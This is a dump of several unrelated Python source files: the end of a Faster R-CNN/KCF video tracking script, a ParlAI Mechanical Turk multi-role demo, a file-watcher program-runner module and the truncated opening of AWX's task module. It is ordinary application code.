# result_file = os.path.join(out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1])
result_file = os.path.join(out_dir, os.path.split('_result.jpg')[1])
print('results saved to %s' % result_file)
im = draw_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
cv2.imwrite(result_file, im)"""
# print(type(xn))
return xn, yn, wn, hn
"""def parse_args():
parser = argparse.ArgumentParser(description='Demonstrate a Faster R-CNN network')
parser.add_argument('--image', help='custom image', default='', type=str)
parser.add_argument('--prefix', help='saved model prefix', type=str)
parser.add_argument('--epoch', help='epoch of pretrained model', type=int)
parser.add_argument('--gpu', help='GPU device to use', default=0, type=int)
parser.add_argument('--vis', help='display result', action='store_true')
parser.add_argument('--network', help='display result', default='vgg', type=str)
parser.add_argument('--in_dir', type=str, default='.')
parser.add_argument('--test', type=str, default='.')
parser.add_argument('--out_dir', type=str, default='.')
parser.add_argument('--label_dir', type=str, default='.')
parser.add_argument('--with_label', type=int, default=1)
args = parser.parse_args()
return args"""
def compare(x, y):
DIR='video_output/'
stat_x = os.stat(DIR + "/" + x)
stat_y = os.stat(DIR + "/" + y)
if stat_x.st_ctime < stat_y.st_ctime:
return -1
elif stat_x.st_ctime > stat_y.st_ctime:
return 1
else:
return 0
def main(predictor,ctx,image, prefix, epoch, gpu, vis, network, in_dir, test, out_dir, label_dir, with_label):
global tp, fp, fn, detect_num
# args = parse_args()
# if args.network == 'vgg':
# symbol = get_vgg_test(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
# elif args.network == 'vggm':
#symbol = eval('get_' + network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
#predictor = get_net(symbol, prefix, epoch, ctx)
if in_dir=='':
x = []
y = []
w = []
h = []
"""result = []
pool = multiprocessing.Pool(processes=len(image))
for i in range(0, len(image)):
result.append(pool.apply_async(demo_net, (predictor, image[i], image[i], with_label, vis, out_dir,
label_dir)))
print(result)
for i in range(0, len(result)):
res = result[i].get()
x.append(res[0])
y.append(res[1])
w.append(res[2])
h.append(res[3])
pool.close()
pool.join()"""
a=image.qsize()
for i in range (0,a):
img=image.get()
x1, y1, w1, h1 = demo_net(predictor,img, img, with_label, vis, out_dir,
label_dir)
x.append(x1)
y.append(y1)
w.append(w1)
h.append(h1)
else:
if image != '':
return demo_net(predictor, image, image, with_label, vis, out_dir, label_dir)
else:
# t0 = time.clock()
# print(os.listdir(in_dir), in_dir)
num = 0
# with open(test) as fd:
# test_imgs = set([n.strip() + '.jpg' for n in fd.readlines()])
iterms = os.listdir(in_dir)
iterms.sort(compare)
# for iterm in iterms:
# print(iterm)
imgs = [img for img in iterms]
print(imgs)
# for image in [ img for img in os.listdir(in_dir) if not os.path.isdir(img) and not img.count('_result.')]:
x = []
y = []
w = []
h = []
for image in imgs:
print(os.path.join(in_dir, image))
x1, y1, w1, h1 = demo_net(predictor, os.path.join(in_dir, image), image, with_label, vis, out_dir,
label_dir)
x.append(x1)
y.append(y1)
w.append(w1)
h.append(h1)
"""num += 1
if with_label:
p = 100.0 * tp / (tp + fp)
r = 100.0 * tp / (tp + fn)
f1 = 2.0 * p * r / (p + r)
print(
'type 1#: avg precision = {}%, avg recall = {}%, avg f1 score = {}% (with tp = {}, fp = {}, fn = {})'.format(
p, r, f1, tp, fp, fn))
print(
'type 2#: avg precision = {}%, avg recall = {}%, avg f1 score = {}%'.format(gp / num, gr / num, gf1 / num))
print(time.clock() - t0, '(with {} samples, detects {} objects)'.format(num, detect_num))"""
return x,y,w,h
selectingObject = False
# initTracking = False
initTracking = True
onTracking = False
ix, iy, cx, cy = 0, 0, -1, -1
w, h = 0, 0
inteval = 1
duration = 0.04
# mouse callback function
def draw_boundingbox(event, x, y, flags, param):
global selectingObject, initTracking, onTracking, ix, iy, cx, cy, w, h
if event == cv2.EVENT_LBUTTONDOWN:
selectingObject = True
onTracking = False
ix, iy = x, y
cx, cy = x, y
elif event == cv2.EVENT_MOUSEMOVE:
cx, cy = x, y
elif event == cv2.EVENT_LBUTTONUP:
selectingObject = False
if (abs(x - ix) > 10 and abs(y - iy) > 10):
w, h = abs(x - ix), abs(y - iy)
ix, iy = min(x, ix), min(y, iy)
initTracking = True
else:
onTracking = False
elif event == cv2.EVENT_RBUTTONDOWN:
onTracking = False
if (w > 0):
ix, iy = x - w / 2, y - h / 2
initTracking = True
def Tracking(trackers, frame):
boundingbox = trackers.update(frame)
boundingbox = map(int, boundingbox)
return boundingbox,trackers
def Renew(x,y,w,h,box):
#print(x,y,w,h)
#print(box)
if len(x)!=len(box):
#print ("renew")
return True
for i in range(len(x)):
if(abs(x[i]-box[i][0])/float(box[i][0])>0.05 or abs(y[i]-box[i][1])/float(box[i][1])>0.05 ):
#print("renew")
return True
#print("remain")
return False
def video(name,ctx):
inteval = 1
duration = 0.01
global selectingObject, initTracking, onTracking, ix, iy, cx, cy, w, h
show_delay=24
network_inteval=8
start = True
store = True
cap = cv2.VideoCapture(name)
t3=time()
video = Queue.Queue(maxsize = show_delay)
k = 0
cn = 0
ct = 0
gpu = 0
renew=True
capture=Queue.Queue(maxsize=show_delay/network_inteval)
cv2.namedWindow('tracking')
cv2.setMouseCallback('tracking', draw_boundingbox)
network='vggm'
prefix='model/e2e'
epoch=20
symbol = eval('get_' + network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
predictor = get_net(symbol, prefix, epoch, ctx)
while (cap.isOpened()or ct!=cn):
ret, frame = cap.read()
if store:
video.put(frame)
if(k%network_inteval==0):
capture.put(frame)
k = k + 1
cn = cn + 1
if k==show_delay:
store=False
else:
if start:
timer = 0
cnt=0
start = False
if not ret:
cap.release()
#break very slow if cap not released
if (selectingObject):
cv2.rectangle(frame, (ix, iy), (cx, cy), (0, 255, 255), 1)
elif (initTracking):
n=[]
x=[]
y=[]
w=[]
h=[]
t5=time()
x1, y1, w1, h1 = main(predictor,ctx,capture, prefix='model/e2e', epoch=20, gpu=0, vis=False, network='vggm',
in_dir='', test='test.txt', out_dir='output/',
label_dir='data/hcar/Annotations/', with_label=1)
t6=time()
print (t6-t5)
for i in range (0,len(x1)):
x.append(x1[i])
y.append(y1[i])
w.append(w1[i])
h.append(h1[i])
n.append(len(x1[i]))
initTracking = False
onTracking = True
elif (onTracking):
ct += 1
timer += 1
t0 = time()
show=video.get()
#if (t%network_inteval==0 and Renew(x[t/network_inteval],y[t/network_inteval],w[t/network_inteval],h[t/network_inteval],box)):
if (timer==1 and renew):
j=cnt
trackers={}
length=n[j]
box=[]
if(length!=0):
pool = multiprocessing.Pool(processes=length)
for i in range(0, length):
ix = x[j][i]
iy = y[j][i]
iw = w[j][i]
ih = h[j][i]
cv2.rectangle(show, (ix, iy), (ix + iw, iy + ih), (0, 255, 255), 2)
tracker = kcftracker.KCFTracker(True, True, True) # hog, fixed_window, multiscale
tracker.init([ix, iy, iw, ih], show)
trackers[i] = tracker
box.append(0)
#elif(t%network_inteval==0):
#pool = multiprocessing.Pool(processes=length)
result = []
for i in range(0, length):
result.append(pool.apply_async(Tracking, (trackers[i], show)))
for i in range(0, length):
res = result[i].get()
trackers[i]=res[1]
#print(res[0][0],res[0][1],res[0][2],res[0][3])
box[i]=res[0]
cv2.rectangle(show, (res[0][0], res[0][1]),
(res[0][0] + res[0][2], res[0][1] + res[0][3]), (0, 255, 255), 1)
t1 = time()
duration = 0.8 * duration + 0.2 * (t1 - t0)
# duration = t1-t0
cv2.putText(show, 'FPS: ' + str(1 / duration)[:4].strip('.'), (8, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.6,
(0, 0, 255), 2)
cv2.imshow('tracking', show)
if (timer == network_inteval):
timer = 0
cnt+=1
if cnt<show_delay/network_inteval:
renew=Renew(x[cnt],y[cnt],w[cnt],h[cnt],box)
else:
renew=True
if renew:
pool.close()
pool.join()
if (cnt==show_delay/network_inteval):
initTracking = True
onTracking = False
cnt=0
if(ret):
video.put(frame)
cn = cn + 1
if(timer==1):
capture.put(frame)
cv2.waitKey(inteval)
"""c = cv2.waitKey(inteval) & 0xFF
# break
if c == 27 or c == ord('q'):
break"""
#print(k,cn,ct)
t4=time()
print (t4-t3)
cv2.destroyAllWindows()
def video_tracking():
print ("java")
if (len(sys.argv) == 1):
cap = cv2.VideoCapture(0)
else:
if (sys.argv[1].isdigit()): # True if sys.argv[1] is str of a nonnegative integer
cap = cv2.VideoCapture(int(sys.argv[1]))
else:
name=[]
for i in range (1,len(sys.argv)):
name.append(sys.argv[i])
print (name)
inteval = 30
gpu = 0
ctx = mx.gpu(gpu)
record=[]
for i in range(0, len(sys.argv)-1):
process = multiprocessing.Process(target=video, args=(str(name[i]),ctx))
process.start()
record.append(process)
# print(boundingbox)
for process in record:
process.join()
if __name__ == '__main__':
video_tracking()
# If you use the HOG feature, there will be a short pause after you draw the first bounding box; that is due to the use of Numba.
|
worlds.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.mturk.core.worlds import MTurkOnboardWorld, MTurkTaskWorld
import threading
class AskerOnboardingWorld(MTurkOnboardWorld):
"""Example onboarding world. Sends a message from the world to the
worker and then exits as complete after the worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the role of the asker. Ask "
"a question that can be answered with just a number. Send any "
"message to continue."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class AnswererOnboardingWorld(MTurkOnboardWorld):
"""Example onboarding world. Sends a message from the world to the
worker and then exits as complete after the worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the role of the answerer. "
"You'll be asked a question that should be answered with a number. "
"Answer with something that makes sense. Enter any number to "
"continue."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class EvaluatorOnboardingWorld(MTurkOnboardWorld):
"""Example onboarding world. Sends a message from the world to the
worker and then exits as complete after the worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the evaluator. You'll "
"observe a series of three questions, and then you'll evaluate "
"whether or not the exchange was accurate. Send an eval to begin."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class MultiRoleAgentWorld(MTurkTaskWorld):
"""
    World to demonstrate workers with asymmetric roles. This task amounts
to three rounds and then an evaluation step. It is purposefully created
as a task to demo multiple views and has no other purpose.
"""
collector_agent_id = 'Moderator'
def __init__(self, opt, mturk_agents):
self.mturk_agents = mturk_agents
for agent in mturk_agents:
if agent.demo_role == 'Asker':
self.asker = agent
elif agent.demo_role == 'Answerer':
self.answerer = agent
else: # 'Evaluator'
self.evaluator = agent
self.episodeDone = False
self.turns = 0
self.questions = []
self.answers = []
self.accepted = None
def parley(self):
if self.turns == 0:
# Instruction for evaluator
ad = {'id': 'System', 'text': "Please observe the chat for accuracy."}
self.evaluator.observe(ad)
if self.turns < 3:
# QA pairing
ad = {
'id': 'System',
'text': "Please ask a question with a numeric answer.",
}
self.asker.observe(ad)
question = self.asker.act()
ad = {'id': 'System', 'text': 'Please answer this question.'}
self.answerer.observe(ad)
self.answerer.observe(question)
self.evaluator.observe(question)
answer = self.answerer.act()
self.evaluator.observe(answer)
self.asker.observe(answer)
self.questions.append(question)
self.answers.append(answer)
self.turns += 1
else:
# evaluate
ad = {'id': 'System', 'text': "Please provide your evaluation."}
self.evaluator.observe(ad)
ad = {'id': 'System', 'text': "Please wait for evaluation."}
self.answerer.observe(ad)
self.asker.observe(ad)
            self.accepted = self.evaluator.act()
self.episodeDone = True
def episode_done(self):
return self.episodeDone
def shutdown(self):
# Parallel shutdown of agents
def shutdown_agent(agent):
try:
agent.shutdown(timeout=None)
except Exception:
agent.shutdown() # not MTurkAgent
threads = []
for agent in self.mturk_agents:
t = threading.Thread(target=shutdown_agent, args=(agent,))
t.start()
threads.append(t)
for t in threads:
t.join()
def review_work(self):
# Can review the work here to accept or reject it
pass
def get_custom_task_data(self):
# brings important data together for the task, to later be used for
# creating the dataset. If data requires pickling, put it in a field
# called 'needs-pickle'.
return {
'questions': self.questions,
'answers': self.answers,
'evaluation': self.accepted,
}
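    # Illustrative note (not part of the original class): parley() runs three
    # question/answer rounds (self.turns 0-2) and then one evaluation turn, after
    # which episode_done() returns True and shutdown() joins the agents in parallel.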
|
coderunner.py
|
# -*- coding: utf-8 -*-
import os
import re
import subprocess
import syslog
import threading
import Queue
from filewatcher import componentprop
_runner_queue = {}
_task_queue_assignment = re.compile('^\(([A-Za-z0-9-]+)\)\s*([^\s].+)$')
_command_carry_variable_macro = re.compile('^%([A-Za-z0-9_-]+)%$')
def _subprocess_worker(worker_qlabel, worker_id, q):
running = True
while running:
try:
cmd = q.get(True, None)
if cmd is not None:
try:
retcode = subprocess.call(cmd)
except Exception as e:
print "Have exception on subprocess.call: cmd=%r; exception=%s" % (cmd, e,)
retcode = -65536
syslog.syslog(syslog.LOG_INFO, "QueuedInvoke: run program [%s] with retcode=%d, worker=%d/%r." % (cmd, retcode, worker_id, worker_qlabel,))
else:
print "subprocess-worker exiting (ID=%d/Q=%r)" % (worker_id, worker_qlabel,)
running = False
q.task_done()
except Queue.Empty:
pass
# ### def _subprocess_worker
class _RunConfiguration:
def __init__(self, queue, command):
self.queue = queue
self.command = command
# ### __init__
# ### class __RunConfiguration
class _RunnerQueue:
""" 放置執行程式的 Runner/Worker 的佇列 """
def __init__(self, queue_label, max_running_process, max_running_second=None):
""" 建構子
參數:
queue_label - 佇列名稱
max_running_process - 最大同時執行行程數,使用 None 表示不指定
max_running_second - 最長程式執行時間 (秒) 上限,使用 None 表示不指定 (** 未實作)
"""
self.queue_label = queue_label
self.max_running_process = max_running_process
self.max_running_second = max_running_second
self.cmd_queue = None
self.workers = None
# ### def __init__
def start_workers(self):
""" 啟動 worker thread
參數: (無)
回傳值: (無)
"""
if (self.max_running_process is None) or (self.max_running_process < 1):
syslog.syslog(syslog.LOG_INFO, "allocated static runner (Q=%r)" % (self.queue_label,))
            return  # do not start any worker when no maximum process count is set
workers_q = []
self.cmd_queue = Queue.Queue()
for idx in range(self.max_running_process):
wk = threading.Thread(target=_subprocess_worker, args=(self.queue_label, idx, self.cmd_queue,))
wk.start()
workers_q.append(wk)
print "created worker named %r (ID=%d/Q=%r)" % (wk.name, idx, self.queue_label,)
self.workers = workers_q
syslog.syslog(syslog.LOG_INFO, "allocated threaded runner (Q=%r, size=%d)" % (self.queue_label, self.max_running_process,))
# ### def start_workers
def run_program(self, cmdlist, filepath, carry_variable, logqueue):
""" 執行指定的程式執行作業
參數:
cmdlist - 要執行程式的路徑與參數
filepath - 作為參數的檔案檔名
carry_variable - 要引入的變數 dict
logqueue - 用作儲存紀錄的 list 物件
回傳值:
(無)
"""
progpath = cmdlist[0]
if (progpath is None) or (not os.path.isfile(progpath)) or (not os.access(progpath, os.X_OK)) or (filepath is None):
logqueue.append("not run any program (cmd=%r, file-path=%r)" % (cmdlist, filepath,))
return
# {{{ build command
cmd = []
for v in cmdlist:
m = _command_carry_variable_macro.match(v)
if m is None:
cmd.append(v)
else:
varname = m.group(1)
if """FILENAME""" == varname: # resolve built-in macro: FILENAME
cmd.append(filepath)
elif varname in carry_variable: # resolve macro from carry_variable
cmd.append(carry_variable[varname])
else: # all the others, just output as one of arguments
cmd.append(v)
# }}} build command
if self.cmd_queue is None:
runprog_retcode = subprocess.call(cmd)
logqueue.append("run program [%s: %r] with retcode=%d" % (progpath, cmd, runprog_retcode))
else:
self.cmd_queue.put(cmd)
logqueue.append("queued program [%s: %r] into queue=%s" % (progpath, cmd, self.queue_label))
# ### def run_program
def stop_workers(self):
""" 停下執行程式的執行緒 workers
參數: (無)
回傳值: (無)
"""
if self.cmd_queue is None:
return # no worker running, naturally
for wk in self.workers:
if wk.is_alive():
self.cmd_queue.put(None)
else:
print "worker %r not alive anymore" % (wk.name,)
syslog.syslog(syslog.LOG_NOTICE, "RunnerQueue joining task queue (Q=%r)" % (self.queue_label,))
self.cmd_queue.join()
# ### def stop_workers
# ### class Runner
_cached_module_prop_instance = componentprop.OperatorProp('program_runner', 'run_program', schedule_priority=None, run_priority=3)
def get_module_prop():
""" 取得操作器各項特性/屬性
參數: (無)
回傳值:
傳回 componentprop.OperatorProp 物件
"""
return _cached_module_prop_instance
# ### def get_module_prop
def operator_configure(config, metastorage):
""" 設定操作器組態
參數:
config - 帶有參數的字典
metastorage - 中介資訊資料庫物件
回傳值:
(無)
"""
default_max_running_process = None
# {{{ get queue size for default queue
if 'max_running_program' in config:
try:
default_max_running_process = int(config['max_running_program'])
except:
default_max_running_process = None
# }}} get queue size for default queue
# {{{ use multiple queues
if 'queue' in config:
# {{{ scan over each queue configuration
for qconfig in config['queue']:
max_running_process = None
if 'max_running_program' in qconfig:
try:
max_running_process = int(qconfig['max_running_program'])
except:
max_running_process = None
if 'name' in qconfig:
qname = str(qconfig['name'])
_runner_queue[qname] = _RunnerQueue(qname, max_running_process)
# }}} scan over each queue configuration
# }}} use multiple queues
# setup default queue
_runner_queue['_DEFAULT'] = _RunnerQueue('_DEFAULT', default_max_running_process)
# {{{ start workers
for runner in _runner_queue.itervalues():
runner.start_workers()
# }}} start workers
# ### def operator_configure
def read_operation_argv(argv):
""" 取得操作設定
參數:
argv - 設定檔中的設定
回傳值:
吻合工作模組需求的設定物件
"""
cmd_argv = None
que_argv = '_DEFAULT'
if isinstance(argv, dict):
if 'queue' in argv:
que_argv = argv['queue']
cmd_argv = argv['command']
else:
cmd_argv = argv
result_cmd = None
# {{{ attempt to build command list as list
if isinstance(cmd_argv, (basestring, str, unicode,)):
result_cmd = [cmd_argv, """%FILENAME%"""]
elif isinstance(cmd_argv, (tuple, list,)):
have_filename_macro = False
result_cmd = []
for v in cmd_argv:
if """%FILENAME%""" == v:
have_filename_macro = True
result_cmd.append(v)
if not have_filename_macro:
result_cmd.append("""%FILENAME%""")
else:
result_cmd = cmd_argv
# }}} attempt to build command list as list
    # {{{ check whether the queue short-cut syntax is used (eg: (QUEUE) /path/to/cmd )
if isinstance(result_cmd, list):
m = _task_queue_assignment.match(result_cmd[0])
if m is not None:
q = m.group(1)
result_cmd[0] = m.group(2)
if q in _runner_queue:
que_argv = q
    # }}} check whether the queue short-cut syntax is used
return _RunConfiguration(que_argv, result_cmd)
# ### read_operation_argv
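# Illustrative example (not part of the original module): passing the string
# "(fast-queue) /usr/local/bin/convert" yields the command
# ['/usr/local/bin/convert', '%FILENAME%'] queued on 'fast-queue', provided a
# queue with that name was configured; otherwise it stays on '_DEFAULT'.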
def perform_operation(current_filepath, orig_filename, argv, oprexec_ref, logqueue=None):
""" 執行操作
參數:
current_filepath - 目標檔案絕對路徑 (如果是第一個操作,可能檔案名稱會是更改過的)
orig_filename - 原始檔案名稱 (不含路徑)
argv - 設定檔給定的操作參數
oprexec_ref - 作業參考物件 (含: 檔案名稱與路徑名稱比對結果、檔案內容數位簽章... etc)
logqueue - 紀錄訊息串列物件
回傳值:
經過操作後的檔案絕對路徑
"""
r_queue = argv.queue
if r_queue not in _runner_queue:
logqueue.append("queue not found: %r"%(r_queue,))
r_queue = '_DEFAULT'
if r_queue not in _runner_queue:
print "ERR: coderunner - missing queue: queue=%r, _runner_queue=%r" % (r_queue, _runner_queue,)
_runner_queue[r_queue].run_program(argv.command, current_filepath, oprexec_ref.carry_variable, logqueue)
return current_filepath
# ### def perform_operation
def operator_stop():
""" 停止作業,準備結束
參數:
(無)
回傳值:
(無)
"""
syslog.syslog(syslog.LOG_NOTICE, "coderunner: stopping all Runner")
for runner in _runner_queue.itervalues():
runner.stop_workers()
syslog.syslog(syslog.LOG_NOTICE, "coderunner: all Runner stopped")
# ### def operator_stop
# vim: ts=4 sw=4 ai nowrap
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in a different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on logging settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
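# Keep assigning the least-loaded managed instances until this group holds at
# least policy_instance_percentage percent of all policy-managed instances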
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
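# Expand the changed keys with their registry-declared dependent settings so their
# cached values are invalidated too; only the original keys are expanded here
# (dependents appended below are not themselves re-expanded)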
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
